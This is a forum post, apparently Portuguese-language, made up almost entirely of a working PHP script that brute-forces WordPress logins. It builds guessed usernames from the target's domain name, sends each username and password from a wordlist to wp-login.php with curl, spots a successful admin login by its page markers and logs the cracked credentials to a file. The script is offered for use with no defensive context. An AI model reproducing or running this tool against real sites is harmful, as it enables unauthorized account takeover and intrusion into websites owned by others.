- Código:
<?php
/*
* Simple Wp BruteForce using usergen
*
* Current users to test (http://sitexample.com)
* -> admin
* -> siteexample
* -> siteexam (substr 8)
*
* php wpBrute.php http://uri wordlist
*
* By n4sss
* Contact: n-l4b[at]hotmail[dot]com
* http://janissaries.org
*
**/
set_time_limit(0);
error_reporting(0);
Class WpBrute{
var $httpResponse = null;
var $log = null;
var $timeout = null;
var $cookieContainer = null;
var $uri = null;
var $fullPath = null;
var $wordlist = null;
var $users = null;
function __construct($uri, $wordlist){
$this->uri = $uri;
$this->log = 'ok_wp.txt';
$this->wordlist = $wordlist;
$this->timeout = 8;
$this->start();
}
function __destruct(){
if(file_exists($this->cookieContainer)){
unlink($this->cookieContainer);
}
printf("\nFinished\n");
}
function save_content($file, $content){
$fp = fopen($file, "a+");
fwrite($fp, $content."\r\n");
fclose($fp);
}
function usergen(){
if(preg_match("/http|www./", $this->uri)) $this->uri = str_replace(array("http://", "www."), "", $this->uri);
$toParse = $this->uri;
if(strstr($toParse, '/')) $toParse = substr($toParse, 0, strpos($toParse, '/'));
$pass = explode(".", $toParse);
$upass = substr($pass[0], 0, 8);
$this->cookieContainer = $pass[0].".cookie";
$this->wordlist[] = $pass[0];
$this->wordlist[] = $upass;
$this->users = array('admin', $pass[0], $upass);
}
function post(){
$this->fullPath = 'http://'.$this->uri.'/wp-login.php';
$msg = '';
foreach($this->users as $user){
foreach($this->wordlist as $password){
$postContent = "log={$user}&pwd={$password}&wp-submit=Log In&redirect_to=http://{$this->uri}/wp-admin/&testcookie=1";
$ch = curl_init();
curl_setopt($ch, CURLOPT_URL, $this->fullPath);
curl_setopt($ch, CURLOPT_FOLLOWLOCATION, 1);
curl_setopt($ch, CURLOPT_RETURNTRANSFER, 1);
curl_setopt($ch, CURLOPT_COOKIEJAR, $this->cookieContainer);
curl_setopt($ch, CURLOPT_COOKIEFILE, $this->cookieContainer);
curl_setopt($ch, CURLOPT_TIMEOUT, $this->timeout);
curl_setopt($ch, CURLOPT_CONNECTTIMEOUT, $this->timeout);
curl_setopt($ch, CURLOPT_HEADER, 1);
curl_setopt($ch, CURLOPT_HTTPHEADER, array('Content-Type: application/x-www-form-urlencoded'));
curl_setopt($ch, CURLOPT_POST, 1);
curl_setopt($ch, CURLOPT_POSTFIELDS, $postContent);
$this->httpResponse = curl_exec($ch);
if(preg_match("/adminmenuback|Comments/", $this->httpResponse)){
$msg = sprintf("[+][OK] %s %s:%s\n", $this->fullPath, $user, $password);
print $msg;
@file_put_contents($this->log, $msg, FILE_APPEND);
exit(0);
}else{
$msg = sprintf("[-] %s:%s\n", $user, $password);
print $msg;
}
}
}
}
function start(){
printf("wp brute by n4sss\n\n[Uri] %s\n[Wordlist] %s\n\nWait the brute!\n", $this->uri, $this->wordlist);
sleep(5);
$this->wordlist = array_filter(explode("\n", file_get_contents($this->wordlist)));
$this->usergen();
$this->post();
}
}
if(isset($argv[1],$argv[2])){
$wpBrute = new WpBrute(trim($argv[1]), trim($argv[2]));
}else{
printf("php %s http://uri wordlist\n", $argv[0]);
exit(0);
}
?>
Participe do fórum, é rápido e fácil